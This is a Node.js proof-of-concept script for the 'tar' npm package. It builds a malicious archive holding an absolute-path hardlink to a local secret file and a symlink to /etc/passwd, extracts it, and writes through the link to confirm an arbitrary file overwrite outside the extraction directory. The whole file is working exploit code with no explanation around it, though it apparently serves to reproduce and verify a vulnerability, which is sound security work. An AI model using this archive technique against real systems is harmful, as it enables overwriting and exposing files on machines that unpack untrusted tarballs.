const fs = require('fs')
const path = require('path')
const tar = require('tar')

const OUT_DIR = path.resolve('out_repro')
const SECRET = path.resolve('secret.txt')
const TAR_FILE = path.resolve('exploit.tar')
const TARGET_SYM = '/etc/passwd'

// Cleanup & Setup
try { 
  fs.rmSync(OUT_DIR, { recursive: true, force: true })
  if (fs.existsSync(SECRET)) fs.unlinkSync(SECRET)
} catch(e) {}

fs.mkdirSync(OUT_DIR, { recursive: true })
fs.writeFileSync(SECRET, 'ORIGINAL_DATA')

console.log(`[+] Target: ${SECRET}`)

// Payload 1: Hardlink with absolute path (Bypasses root)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: SECRET 
})
h1.encode()

// Payload 2: Symlink to absolute system path
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: TARGET_SYM 
})
h2.encode()

// Generate archive
const data = Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ])
fs.writeFileSync(TAR_FILE, data)
console.log(`[+] Created malicious archive: ${TAR_FILE}`)

// Trigger extraction
console.log('[*] Extracting...')

tar.x({
  cwd: OUT_DIR,
  file: TAR_FILE,
  preservePaths: false 
}).then(() => {
  // Verification
  try {
    const linkPath = path.join(OUT_DIR, 'exploit_hard')
    
    // Attempt overwrite via the extracted link
    fs.writeFileSync(linkPath, 'VULN_CONFIRMED')
    
    if (fs.readFileSync(SECRET, 'utf8') === 'VULN_CONFIRMED') {
        console.log('[!] VULNERABLE: Arbitrary file overwrite successful.')
    } else {
        console.log('[-] Failed: File not overwritten (Patched?).')
    }
  } catch (e) {
    console.log('[-] Error during verification:', e.message)
  }
})